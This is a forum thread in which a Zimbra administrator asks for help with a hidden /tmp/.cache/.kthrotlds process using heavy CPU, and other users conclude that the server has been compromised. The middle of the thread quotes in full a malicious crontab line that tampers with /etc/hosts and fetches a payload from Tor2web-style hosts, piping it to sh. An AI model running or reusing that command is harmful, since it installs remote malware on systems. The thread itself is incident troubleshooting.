ML
    • Recent
    • Categories
    • Tags
    • Popular
    • Users
    • Groups
    • Register
    • Login

    Zimbra /tmp/.cache/.kthrotlds 400% CPU usage

    IT Discussion
    zimbra
    3
    14
    1.0k
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • N
      nagendra
      last edited by scottalanmiller

        PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
      13921 zimbra    20   0  354748  11156    720 S **299**.6  0.1   4:13.99 /tmp/.cache/.kthrotlds
      

      any idea where excatly this is running i tried delete tmp folder
      still crontab entry keeps getting created automatically
      where excatly its excuting ..please help

      1 Reply Last reply Reply Quote 0
      • scottalanmillerS
        scottalanmiller
        last edited by

        @nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

        /tmp/.cache/.kthrotlds

        in theory this is the name of the process.

        N 1 Reply Last reply Reply Quote 0
        • scottalanmillerS
          scottalanmiller
          last edited by

          Is the system fully updated?

          1 Reply Last reply Reply Quote 0
          • N
            nagendra
            last edited by

            yes its update...i had same issue last time i found some scripts in tmp
            i just modified inside that and it stopped for somtime..now again its started..

            1 Reply Last reply Reply Quote 0
            • N
              nagendra @scottalanmiller
              last edited by

              @scottalanmiller yes scott

              1 Reply Last reply Reply Quote 1
              • scottalanmillerS
                scottalanmiller
                last edited by

                This appears to be an exploit. Most likely your system has been compromised.

                1 Reply Last reply Reply Quote 1
                • scottalanmillerS
                  scottalanmiller
                  last edited by

                  https://forums.zimbra.org/viewtopic.php?t=65932&start=120

                  1 Reply Last reply Reply Quote 0
                  • N
                    nagendra
                    last edited by

                    ok shud i re-install... i have a backup

                    scottalanmillerS 1 Reply Last reply Reply Quote 0
                    • scottalanmillerS
                      scottalanmiller @nagendra
                      last edited by

                      @nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

                      ok shud i re-install... i have a backup

                      Maybe.

                      There is one line in crontab and even when deleted, it comes back?

                      1 Reply Last reply Reply Quote 0
                      • N
                        nagendra
                        last edited by

                        yes this is the entry...

                        /11 * * * * R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to [email protected]" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.|timesync.su|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
                        ~
                        ~

                        1 Reply Last reply Reply Quote 0
                        • scottalanmillerS
                          scottalanmiller
                          last edited by

                          Yeah, definitely compromised. So the biggest issue is... finding the compromise. It could be anywhere.

                          1 Reply Last reply Reply Quote 1
                          • N
                            nagendra
                            last edited by

                            @scottalanmiller said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

                            nding the compromise. It could be anywhere.

                            yah better install free zimbra restore the backup...

                            scottalanmillerS dbeatoD 2 Replies Last reply Reply Quote 0
                            • scottalanmillerS
                              scottalanmiller @nagendra
                              last edited by

                              @nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

                              @scottalanmiller said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

                              nding the compromise. It could be anywhere.

                              yah better install free zimbra restore the backup...

                              Yeha, I think so.

                              1 Reply Last reply Reply Quote 0
                              • dbeatoD
                                dbeato @nagendra
                                last edited by

                                @nagendra said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

                                @scottalanmiller said in Zimbra /tmp/.cache/.kthrotlds 400% CPU usage:

                                nding the compromise. It could be anywhere.

                                yah better install free zimbra restore the backup...

                                What is your OS version?

                                1 Reply Last reply Reply Quote 0
                                • 1 / 1
                                • First post
                                  Last post